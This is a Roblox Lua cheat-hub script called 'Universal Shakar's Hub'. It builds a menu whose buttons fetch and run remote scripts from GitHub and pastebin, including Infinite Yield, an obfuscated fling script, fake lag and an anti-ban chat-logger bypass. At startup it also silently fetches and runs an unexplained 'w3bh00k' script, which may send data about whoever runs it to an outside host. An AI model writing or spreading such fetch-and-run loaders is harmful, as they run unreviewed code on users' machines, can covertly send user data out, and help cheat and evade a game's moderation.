--Window & Library
------------------------------------------------------------------
local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/thanhdat4461/OrionMoblie/main/source')))() 

local Window = OrionLib:MakeWindow({Name = " ⭐️ USH -- Universal Shakar's Hub ⭐️", HidePremium = false, IntroEnabled = false, SaveConfig = true, ConfigFolder = "shakar"})
------------------------------------------------------------------
--WebHook

loadstring(game:HttpGet("https://raw.githubusercontent.com/shakar60/w3bh00k/main/s",true))()

------------------------------------------------------------------
--1st Notify

local AkaliNotif = loadstring(game:HttpGet("https://raw.githubusercontent.com/Kinlei/Dynissimo/main/Scripts/AkaliNotif.lua"))();
local Notify = AkaliNotif.Notify;
Notify({
Description = "Universal Shakars Hub Loaded";
Title = "USH Loaded";
Duration = 5;
});
------------------------------------------------------------------
--2nd Notify

game.StarterGui:SetCore("SendNotification", {
Title = "USH Loaded"; 
Text = "Made by shakar#6955 Helped By karvine"; 
Duration = 5; 
})

game.StarterGui:SetCore("SendNotification", {
Title = "Join discord"; 
Text = "https://discord.gg/g86HSsjt"; 
Duration = 10; 
})
------------------------------------------------------------------
--Notifacation 3

local NotificationBindable = Instance.new("BindableFunction")

function NotificationBindable.OnInvoke(buttonPressed)
if buttonPressed == "Yeah" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/AnthonyIsntHere/anthonysrepository/main/scripts/AntiChatLogger.lua"))()
elseif buttonPressed == "Nah im good" then
-- Do something when the Nah im good button is pressed
end
end

game.StarterGui:SetCore("SendNotification", {
Title = "Do You Want Anti Ban Script?",
Text = "Loads Anti Ban Script",
Button1 = "Yeah",
Button2 = "Nah im good",
Callback = NotificationBindable
})
------------------------------------------------------------------
-- Tabs 

local Tab1 = Window:MakeTab({
Name = "Home",
Icon = "rbxassetid://4483345998",
PremiumOnly = false
})

local Tab2 = Window:MakeTab({
Name = "Scripts",
Icon = "rbxassetid://4483345998",
PremiumOnly = false
})

local Tab3 = Window:MakeTab({
Name = "Guis/hubs",
Icon = "rbxassetid://4483345998",
PremiumOnly = false
})

local Tab4 = Window:MakeTab({
Name = "Player",
Icon = "rbxassetid://4483345998",
PremiumOnly = false
})

local Tab5 = Window:MakeTab({
Name = "Credits",
Icon = "rbxassetid://4483345998",
PremiumOnly = false
})
-- Paragraph
------------------------------------------------------------------
Tab1:AddParagraph("TEAM USH","Was Kavo Ui Switched to Orion Libary")
Tab1:AddParagraph("Join Discord For More Info","Or Dm shakar60")
Tab1:AddParagraph("Created By shakar60 On Discord","Shakar's Discord")
Tab1:AddParagraph("Helped By karvine On Discord","karvine's Discord")
Tab1:AddParagraph("https://discord.gg/DraFmeP4","Discord Server")
------------------------------------------------------------------
--Button & Scripts

local Tab2Section = Tab2:AddSection({
    Name = "Infinite Yield"
})

Tab2:AddButton({
Name = "Infinite Yield",
Callback = function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
print("Script Executed")
end 
})

local Tab2Section = Tab2:AddSection({
    Name = "Fling Switch"
})

Tab2:AddButton({
Name = "Fling Switch",
Callback = function()
loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/obf_4Q10q272NIQc093Os32uBi29U9PWkU0d3Tr1Uh4k92vus2u10786Z0jep5uhqE2N.lua.txt'),true))()
print("Script Executed")
end 
})

local Tab2Section = Tab2:AddSection({
    Name = "Fake Lag"
})

Tab2:AddButton({
Name = "Fake Lag",
Callback = function()
loadstring(game:HttpGet('https://pastebin.com/raw/VM3b0Thg'))()
print("Script Executed")
end 
})

local Tab2Section = Tab2:AddSection({
    Name = "Keyboard Script"
})

Tab2:AddButton({
Name = "Keyboard Script",
Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))()
print("Script Executed")
end 
})

local Tab2Section = Tab2:AddSection({
    Name = "Vhub"
})

Tab2:AddButton({
Name = "Vhub",
Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/V31nc/2642/Created/VHub"))()
print("Script Executed")
end 
})

local Tab2Section = Tab2:AddSection({
    Name = "Unfair Hub"
})

Tab2:AddButton({
Name = "Unfair hub",
Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/rblxscriptsnet/rblxhub/main/rblxhub.lua"))()
print("Script Executed")
end 
})

local Tab2Section = Tab2:AddSection({
    Name = "Rizz Script"
})

Tab2:AddButton({
Name = "Rizz Script",
Callback = function()
loadstring(game:HttpGet("https://pastebin.com/raw/pPMRh5YJ"))()
print("Script Executed")
end 
})

local Tab2Section = Tab2:AddSection({
    Name = "PackGod Script"
})

Tab2:AddButton({
Name = "PackGod Script",
Callback = function()
loadstring(game:HttpGet("https://pastebin.com/raw/pPMRh5YJ"))()
print("Script Executed")
end 
})

OrionLib:Init()
